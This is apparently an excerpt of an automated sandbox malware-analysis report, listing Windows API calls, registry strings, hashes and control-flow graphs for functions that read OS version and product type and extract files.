                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5aff01162672ac197748696b69125fc239c06a97924343cb9dd36f3fbeb43ff7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 186147B0500B49DFD711CF24C54839AFBE0FF05308F148A5ED68A9B392D7B5AA0ACB81
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,?,?,?,?,?,?,00000000,6A59E429,000000FF), ref: 6A563B5A
                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNEL32(?,CurrentMajorVersionNumber,00000000,00000000,?,?,?,?,?,?,?,?,00000000,6A59E429,000000FF), ref: 6A563B8F
                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNEL32(?,CurrentMinorVersionNumber,00000000,00000000,?,?,?,?,?,?,?,?,00000000,6A59E429,000000FF), ref: 6A563BA5
                                                                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,CurrentVersion,00000000,00000000,?,?,?,?,?,?,?,?,00000000,6A59E429,000000FF), ref: 6A563BCB
                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNEL32(?,CurrentBuildNumber,00000000,00000000,?,?,?,?,?,?,?,?,00000000,6A59E429,000000FF), ref: 6A563C34
                                                                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,BuildBranch,00000000,00000000,?,?,?,?,?,?,?,?,00000000,6A59E429,000000FF), ref: 6A563C8D
                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNEL32(?,ReleaseId,00000000,00000000,?,?,?,?,?,?,?,?,00000000,6A59E429,000000FF), ref: 6A563CE4
                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNEL32(?,CSDVersion,00000000,00000000,?,?,?,?,?,?,?,?,00000000,6A59E429,000000FF), ref: 6A563D23
                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,?,?,?,?,00000000,6A59E429,000000FF), ref: 6A563DBE
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6A563DC5
                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,00000000,6A59E429,000000FF), ref: 6A563DF6
                                                                                                                                                                                                                                                                          • IsWow64Process.KERNEL32(00000000,?,?,?,?,?,?,00000000,6A59E429,000000FF), ref: 6A563DFD
                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00000000,6A59E429,000000FF), ref: 6A563E2E
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: QueryValue$Process$AddressCloseCurrentHandleModuleOpenProcWow64
                                                                                                                                                                                                                                                                          • String ID: BuildBranch$CSDVersion$CurrentBuildNumber$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$IsWow64Process$ReleaseId$Software\Microsoft\Windows NT\CurrentVersion$co_release$kernel32$rs_prerelease
                                                                                                                                                                                                                                                                          • API String ID: 2654979339-525127412
                                                                                                                                                                                                                                                                          • Opcode ID: cb5799a802ffcc71dd4a6127acf32c4e6e9587f008ac134bdcdc24b63edfda0c
                                                                                                                                                                                                                                                                          • Instruction ID: 4166c3ea587f84159c387a20bc11e423b752cc4cfe2d9b2cd6236814bc9b7810
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb5799a802ffcc71dd4a6127acf32c4e6e9587f008ac134bdcdc24b63edfda0c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3BA160B1900219AFDF21DF64CD44BEEBBF8FB04715F110126E915EB291EB74AA44CBA4
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,00000000), ref: 002BB09E
                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNEL32(00000000,CurrentMajorVersionNumber,00000000,00000000,?,?), ref: 002BB0E5
                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNEL32(00000000,CurrentMinorVersionNumber,00000000,00000000,?,00000004), ref: 002BB104
                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,?,?), ref: 002BB1A8
                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNEL32(00000000,ReleaseId,00000000,00000000,?,?), ref: 002BB274
                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNEL32(00000000,CSDVersion,00000000,00000000,?,?), ref: 002BB2C6
                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 002BB363
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 002BB36A
                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 002BB37E
                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?), ref: 002BB3A1
                                                                                                                                                                                                                                                                          • IsWow64Process.KERNEL32(00000000), ref: 002BB3A8
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: QueryValue$Process$AddressCurrentHandleInit_thread_footerModuleOpenProcWow64
                                                                                                                                                                                                                                                                          • String ID: BuildBranch$CSDVersion$CurrentBuildNumber$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$IsWow64Process$ReleaseId$Software\Microsoft\Windows NT\CurrentVersion$co_release$kernel32$rs_prerelease$>
                                                                                                                                                                                                                                                                          • API String ID: 3644797652-1124079873
                                                                                                                                                                                                                                                                          • Opcode ID: 5e861df92ec5c4caff7f81ecab6d257d062a4ed4901db1b079b224ac6777868c
                                                                                                                                                                                                                                                                          • Instruction ID: 5cdb9d73d6887f10a7282b91c522453796a6713a10739285096aac378bc23604
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e861df92ec5c4caff7f81ecab6d257d062a4ed4901db1b079b224ac6777868c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2A18D71910369DADB21DF20CC45BEEB7F8FB04745F0441EAE949A6191EBB4AA84CF84
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 104 2bb410-2bb488 RegOpenKeyExW 106 2bb48e-2bb4bf RegQueryValueExW 104->106 107 2bb6f2-2bb70b 104->107 110 2bb50f-2bb53a RegQueryValueExW 106->110 111 2bb4c1-2bb4d3 call 2bffb0 106->111 108 2bb71e-2bb739 call 34933a 107->108 109 2bb70d-2bb714 RegCloseKey 107->109 109->108 110->107 112 2bb540-2bb551 110->112 120 2bb4d5-2bb4e2 111->120 121 2bb4e4-2bb4fb call 2bffb0 111->121 115 2bb55d-2bb55f 112->115 116 2bb553-2bb55b 112->116 115->107 119 2bb565-2bb56c 115->119 116->115 116->116 122 2bb570-2bb57e call 2bffb0 119->122 123 2bb50a 120->123 127 2bb4fd 121->127 128 2bb502-2bb508 121->128 130 2bb589-2bb597 call 2bffb0 122->130 131 2bb580-2bb584 122->131 123->110 127->128 128->123 136 2bb599-2bb59d 130->136 137 2bb5a2-2bb5b0 call 2bffb0 130->137 132 2bb6c4 131->132 134 2bb6cb-2bb6d8 132->134 138 2bb6ea-2bb6ec 134->138 139 2bb6da 134->139 136->132 143 2bb5bb-2bb5c9 call 2bffb0 137->143 144 2bb5b2-2bb5b6 137->144 138->107 138->122 141 2bb6e0-2bb6e8 139->141 141->138 141->141 147 2bb5cb-2bb5cf 143->147 148 2bb5d4-2bb5e2 call 2bffb0 143->148 144->132 147->132 151 2bb5ed-2bb5fb call 2bffb0 148->151 152 2bb5e4-2bb5e8 148->152 155 2bb5fd-2bb601 151->155 156 2bb606-2bb614 call 2bffb0 151->156 152->132 155->132 159 2bb61f-2bb62d call 2bffb0 156->159 160 2bb616-2bb61a 156->160 163 2bb639-2bb647 call 2bffb0 159->163 164 2bb62f-2bb634 159->164 160->132 168 2bb649-2bb64e 163->168 169 2bb650-2bb65e call 2bffb0 163->169 165 2bb6c1 164->165 165->132 168->165 172 2bb660-2bb665 169->172 173 2bb667-2bb675 call 2bffb0 169->173 172->165 176 2bb67e-2bb68c call 2bffb0 173->176 177 2bb677-2bb67c 173->177 180 2bb68e-2bb693 176->180 181 2bb695-2bb6a3 call 2bffb0 176->181 177->165 180->165 184 2bb6ac-2bb6ba call 2bffb0 181->184 185 2bb6a5-2bb6aa 181->185 184->134 188 2bb6bc 184->188 185->165 188->165
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000002,SYSTEM\CurrentControlSet\Control\ProductOptions,00000000,00020119,00000000), ref: 002BB480
                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNEL32(00000000,ProductType,00000000,00000000,?), ref: 002BB4BB
                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNEL32(00000000,ProductSuite,00000000,00000000,?,?), ref: 002BB536
                                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 002BB70E
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: QueryValue$CloseOpen
                                                                                                                                                                                                                                                                          • String ID: BackOffice$Blade$CommunicationServer$Compute Server$DataCenter$Embedded(Restricted)$EmbeddedNT$Enterprise$Personal$ProductSuite$ProductType$SYSTEM\CurrentControlSet\Control\ProductOptions$Security Appliance$ServerNT$Small Business$Small Business(Restricted)$Storage Server$Terminal Server$WinNT$>
                                                                                                                                                                                                                                                                          • API String ID: 1586453840-1501444835
                                                                                                                                                                                                                                                                          • Opcode ID: c5aacd3c69cee392d80e74c13c28216dc0a899ebf80bd75b507da64a5fa7706b
                                                                                                                                                                                                                                                                          • Instruction ID: 323ec29ff448ea9610484b1f4916cfbe443bec562511dc3af320a0077bcf0d94
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5aacd3c69cee392d80e74c13c28216dc0a899ebf80bd75b507da64a5fa7706b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C37112357203698ADB22DF25CD807FA73A9EF41380F104575E906AB6D6EBB4CC648B41
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 189 6a563e60-6a563ed4 RegOpenKeyExW 191 6a56434e-6a564361 189->191 192 6a563eda-6a563f02 RegQueryValueExW 189->192 193 6a564363-6a56436a RegCloseKey 191->193 194 6a564371-6a564393 call 6a56cbbc 191->194 195 6a563f8c-6a563fab RegQueryValueExW 192->195 196 6a563f08-6a563f0d 192->196 193->194 195->191 197 6a563fb1-6a563fc2 195->197 198 6a563f10-6a563f25 196->198 200 6a563fc4-6a563fcc 197->200 201 6a563fd1-6a563fd3 197->201 202 6a563f27 198->202 203 6a563f42-6a563f47 198->203 200->200 205 6a563fce 200->205 201->191 207 6a563fd9-6a563feb 201->207 202->203 206 6a563f29-6a563f2c 202->206 208 6a563f50-6a563f65 203->208 205->201 209 6a563f33-6a563f40 206->209 210 6a563f2e-6a563f31 206->210 211 6a563ff0-6a563ffa 207->211 212 6a563f67 208->212 213 6a563f7a 208->213 214 6a563f87 209->214 210->198 210->209 215 6a564000-6a56400e 211->215 212->213 216 6a563f69-6a563f6c 212->216 217 6a563f7f-6a563f85 213->217 214->195 218 6a564010 215->218 219 6a56402c-6a56403c 215->219 220 6a563f73-6a563f78 216->220 221 6a563f6e-6a563f71 216->221 217->214 218->219 222 6a564012-6a564015 218->222 223 6a564040-6a56404e 219->223 220->217 221->208 221->220 224 6a564017-6a56401a 222->224 225 6a56401c-6a564027 222->225 226 6a564050 223->226 227 6a56406c-6a56407c 223->227 224->215 224->225 229 6a56431e-6a564334 225->229 226->227 230 6a564052-6a564055 226->230 228 6a564080-6a56408e 227->228 233 6a564090 228->233 234 6a5640ac-6a5640bc 228->234 235 6a564336-6a56433e 229->235 236 6a564343-6a564348 229->236 231 6a564057-6a56405a 230->231 232 6a56405c-6a564067 230->232 231->223 231->232 232->229 233->234 237 6a564092-6a564095 233->237 238 6a5640c0-6a5640ce 234->238 235->235 239 6a564340 235->239 236->191 236->211 240 6a564097-6a56409a 237->240 241 6a56409c-6a5640a7 237->241 242 6a5640d0 238->242 243 6a5640ec-6a5640fc 238->243 239->236 240->228 240->241 241->229 242->243 244 6a5640d2-6a5640d5 242->244 245 6a564100-6a56410e 243->245 248 6a5640d7-6a5640da 244->248 249 6a5640dc-6a5640e7 244->249 246 6a564110 245->246 247 6a56412c-6a56413c 245->247 246->247 250 6a564112-6a564115 246->250 251 6a564140-6a56414e 247->251 248->238 248->249 249->229 252 6a564117-6a56411a 250->252 253 6a56411c-6a564127 250->253 254 6a564150 251->254 255 6a56416c-6a56417c 251->255 252->245 252->253 253->229 254->255 256 6a564152-6a564155 254->256 257 6a564180-6a56418e 255->257 258 6a564157-6a56415a 256->258 259 6a56415c-6a564167 256->259 260 6a564190 257->260 261 6a5641ac-6a5641bc 257->261 258->251 258->259 259->229 260->261 263 6a564192-6a564195 260->263 262 6a5641c0-6a5641ce 261->262 264 6a5641f0-6a5641fd 262->264 265 6a5641d0 262->265 266 6a564197-6a56419a 263->266 267 6a56419c-6a5641a7 263->267 269 6a564200-6a56420e 264->269 265->264 268 6a5641d2-6a5641d5 265->268 266->257 266->267 267->229 270 6a5641d7-6a5641da 268->270 271 6a5641dc-6a5641eb 268->271 272 6a564226-6a56422d 269->272 273 6a564210 269->273 270->262 270->271 271->229 275 6a564230-6a56423e 272->275 273->272 274 6a564212-6a564215 273->274 276 6a564217-6a56421a 274->276 277 6a56421c-6a564221 274->277 278 6a564256-6a56425d 275->278 279 6a564240 275->279 276->269 276->277 281 6a564311-6a564314 277->281 280 6a564260-6a56426e 278->280 279->278 282 6a564242-6a564245 279->282 285 6a564286-6a56428d 280->285 286 6a564270 280->286 287 6a56431b 281->287 283 6a564247-6a56424a 282->283 284 6a56424c-6a564251 282->284 283->275 283->284 284->281 289 6a564290-6a56429e 285->289 286->285 288 6a564272-6a564275 286->288 287->229 290 6a564277-6a56427a 288->290 291 6a56427c-6a564281 288->291 292 6a5642b3-6a5642bd 289->292 293 6a5642a0 289->293 290->280 290->291 291->281 295 6a5642c0-6a5642ce 292->295 293->292 294 6a5642a2-6a5642a5 293->294 298 6a5642a7-6a5642aa 294->298 299 6a5642ac-6a5642b1 294->299 296 6a5642e3-6a5642eb 295->296 297 6a5642d0 295->297 301 6a5642f0-6a5642fe 296->301 297->296 300 6a5642d2-6a5642d5 297->300 298->289 298->299 299->281 302 6a5642d7-6a5642da 300->302 303 6a5642dc-6a5642e1 300->303 301->287 304 6a564300 301->304 302->295 302->303 303->281 304->287 305 6a564302-6a564305 304->305 306 6a564307-6a56430a 305->306 307 6a56430c 305->307 306->301 306->307 307->281
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000002,SYSTEM\CurrentControlSet\Control\ProductOptions,00000000,00020119,?,?,?,?,?,?,00000000,6A59E46D,000000FF), ref: 6A563ECC
                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNEL32(?,ProductType,00000000,00000000,?,?,?,?,?,?,?,00000000,6A59E46D,000000FF), ref: 6A563EFE
                                                                                                                                                                                                                                                                          • RegQueryValueExW.KERNEL32(?,ProductSuite,00000000,00000000,?,?,?,?,?,?,?,00000000,6A59E46D,000000FF), ref: 6A563FA7
                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000,6A59E46D,000000FF), ref: 6A564364
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: QueryValue$CloseOpen
                                                                                                                                                                                                                                                                          • String ID: BackOffice$Blade$CommunicationServer$Compute Server$DataCenter$Embedded(Restricted)$EmbeddedNT$Enterprise$Personal$ProductSuite$ProductType$SYSTEM\CurrentControlSet\Control\ProductOptions$Security Appliance$Small Business$Small Business(Restricted)$Storage Server$Terminal Server
                                                                                                                                                                                                                                                                          • API String ID: 1586453840-555442329
                                                                                                                                                                                                                                                                          • Opcode ID: 92f062eb09715d3e234366e3f92b53a9a19f744e55ac636754846e63b2acbd66
                                                                                                                                                                                                                                                                          • Instruction ID: 101a2da8a4dfce9f33039623966f13390e6bfa03f62bff8390423ac53f9b115d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92f062eb09715d3e234366e3f92b53a9a19f744e55ac636754846e63b2acbd66
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2DE124346002568BDB50DF94D6203FAFBF1FF02365F56A245EC84AB5A9EF348A81C794
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 308 2d7b60-2d7b70 309 2d7ba6-2d7baa 308->309 310 2d7b72 308->310 311 2d7b74-2d7b76 310->311 312 2d7b78-2d7b7b 311->312 313 2d7bb6-2d7bff call 1c7340 311->313 312->313 315 2d7b7d-2d7b89 312->315 322 2d7c05-2d7c08 313->322 323 2d8386-2d838d call 1c7340 313->323 317 2d7b9b-2d7ba1 315->317 318 2d7b8b-2d7b99 call 1c3080 315->318 317->311 321 2d7ba3 317->321 318->317 327 2d7bad-2d7bb3 318->327 321->309 322->323 325 2d7c0e-2d7c20 322->325 330 2d8392-2d8397 call 1b9ae0 323->330 328 2d7c54-2d7c60 325->328 329 2d7c22-2d7c24 325->329 334 2d7c79 328->334 335 2d7c62-2d7c69 328->335 331 2d7c3e-2d7c51 329->331 332 2d7c26-2d7c38 329->332 338 2d839c-2d83a8 call 1b9ae0 330->338 332->331 336 2d7c7c-2d7cf2 call 1b9620 call 2ab9f0 call 1bcaf0 call 2b68f0 334->336 335->334 337 2d7c70-2d7c77 335->337 351 2d7cfc-2d7d11 336->351 352 2d7cf4-2d7cf7 336->352 337->334 337->336 338->308 353 2d7d1b-2d7d1f 351->353 354 2d7d13-2d7d16 351->354 352->351 355 2d7d8c-2d7d9e call 2e3330 353->355 356 2d7d21-2d7d4e GetLastError call 2b9370 call 2b62a0 353->356 354->353 361 2d7da4-2d7dac 355->361 362 2d7e90-2d7e92 355->362 369 2d7d50 356->369 370 2d7d53-2d7d78 call 2c4d10 356->370 364 2d7dae-2d7dbc 361->364 365 2d7dc2-2d7dc9 361->365 367 2d7ece-2d7ed2 362->367 368 2d7e94-2d7ec0 call 2b62a0 362->368 364->362 364->365 373 2d7dcf-2d7dd8 call 1b9e20 365->373 374 2d7e86-2d7e8b 365->374 371 2d7ed4-2d7ede call 2b4240 367->371 372 2d7ee3-2d7f26 call 2b66d0 CreateFileW 367->372 396 2d7ec5-2d7eca 368->396 397 2d7ec2 368->397 369->370 392 2d7d7a-2d7d7d 370->392 393 2d7d82-2d7d87 370->393 371->372 394 2d7f2c-2d7f59 GetLastError call 2b9370 call 2b62a0 372->394 395 2d8070-2d8097 SetFilePointer 372->395 373->330 391 2d7dde-2d7e15 call 1cf3c0 call 2ab9f0 373->391 381 2d8330-2d8347 374->381 383 2d8349-2d834c 381->383 384 2d8351-2d8366 381->384 383->384 389 2d8368-2d836b 384->389 390 2d8370-2d8383 384->390 389->390 425 2d7e39-2d7e5e call 2e4960 391->425 426 2d7e17-2d7e1c 391->426 392->393 393->381 413 2d7f5e-2d7f85 call 2c4d10 394->413 414 2d7f5b 394->414 398 2d8099-2d80ca GetLastError call 2b9370 call 2b62a0 395->398 399 2d8110-2d814f call 2b88a0 395->399 396->367 397->396 420 2d80cc 398->420 421 2d80cf-2d80e8 call 2c4d10 398->421 410 2d8152-2d8154 399->410 415 2d816a-2d8190 ReadFile 410->415 416 2d8156-2d8161 410->416 435 2d7f8f-2d7f96 413->435 436 2d7f87-2d7f8a 413->436 414->413 422 2d81f4-2d81f9 415->422 423 2d8192-2d8197 415->423 437 2d82c5-2d82d0 416->437 438 2d8167 416->438 420->421 454 2d80eb-2d80f6 421->454 429 2d81fb-2d81fd 422->429 430 2d8231-2d823c 422->430 423->422 432 2d8199-2d819d 423->432 462 2d7e68-2d7e7c 425->462 463 2d7e60-2d7e63 425->463 433 2d7e20-2d7e29 426->433 439 2d8200-2d8202 429->439 443 2d823e-2d8246 FindCloseChangeNotification 430->443 444 2d8249-2d824f 430->444 441 2d81af-2d81c2 WriteFile 432->441 442 2d819f-2d81ac call 2f4050 432->442 433->433 448 2d7e2b-2d7e34 call 1cf3c0 433->448 452 2d7f9c-2d7fa5 call 1b9e20 435->452 453 2d8100-2d810b 435->453 436->435 450 2d8300-2d830d call 349bf5 437->450 438->415 439->323 451 2d8208-2d820b 439->451 441->422 445 2d81c4-2d81c9 441->445 442->441 443->444 446 2d8251-2d8253 444->446 447 2d8272-2d82a7 CreateFileW 444->447 445->422 456 2d81cb-2d81dd 445->456 446->447 457 2d8255-2d8258 446->457 460 2d82a9-2d82c3 447->460 461 2d82d2-2d82dd call 2dab50 447->461 448->425 458 2d8314-2d8324 450->458 451->323 465 2d8211-2d8221 451->465 452->338 483 2d7fab-2d7fce call 1cf3c0 452->483 453->458 454->453 467 2d80f8-2d80fb 454->467 473 2d81ec-2d81ee 456->473 474 2d81df-2d81e9 456->474 457->447 469 2d825a-2d825d 457->469 458->381 475 2d8326-2d8329 CloseHandle 458->475 470 2d82e2-2d82f2 460->470 461->470 462->374 478 2d7e7e-2d7e81 462->478 463->462 476 2d8228-2d822f 465->476 477 2d8223 465->477 467->453 469->447 480 2d825f-2d8262 469->480 481 2d82fe 470->481 482 2d82f4-2d82f7 CloseHandle 470->482 473->410 473->422 474->473 475->381 476->430 476->439 477->476 478->374 480->447 484 2d8264-2d8267 480->484 481->450 482->481 490 2d7fee-2d8019 call 1cf3c0 GetLastError call 2b9370 483->490 491 2d7fd0-2d7fd2 483->491 484->447 486 2d8269-2d826c 484->486 486->447 486->481 499 2d8039-2d805b call 2e4960 490->499 500 2d801b-2d801d 490->500 492 2d7fd5-2d7fde 491->492 492->492 494 2d7fe0-2d7fe9 call 1cf3c0 492->494 494->490 506 2d805d-2d8060 499->506 507 2d8065-2d806e 499->507 501 2d8020-2d8029 500->501 501->501 503 2d802b-2d8034 call 1cf3c0 501->503 503->499 506->507 507->454
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?), ref: 002D7D21
                                                                                                                                                                                                                                                                            • Part of subcall function 002E3330: GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 002E340A
                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?), ref: 002D7F0C
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?), ref: 002D7F2C
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?, Error:,00000007,Failed to extract file:,00000017,?,?,?,?,?,?,?,?), ref: 002D7FFE
                                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?), ref: 002D808E
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?), ref: 002D8099
                                                                                                                                                                                                                                                                            • Part of subcall function 002B9370: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,DF534560,?,00000000), ref: 002B93BB
                                                                                                                                                                                                                                                                            • Part of subcall function 002B9370: GetLastError.KERNEL32(?,00000000), ref: 002B93C5
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,00010000,?,?,?), ref: 002D8188
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,00000000,?,?,?), ref: 002D81BA
                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(?,?,?,?), ref: 002D823F
                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 002D8287
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,003D74EC,?,?,?), ref: 002D82F5
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,003D74EC,?,?,?), ref: 002D8327
                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,00000000,?,?), ref: 002D8510
                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,?), ref: 002D8545
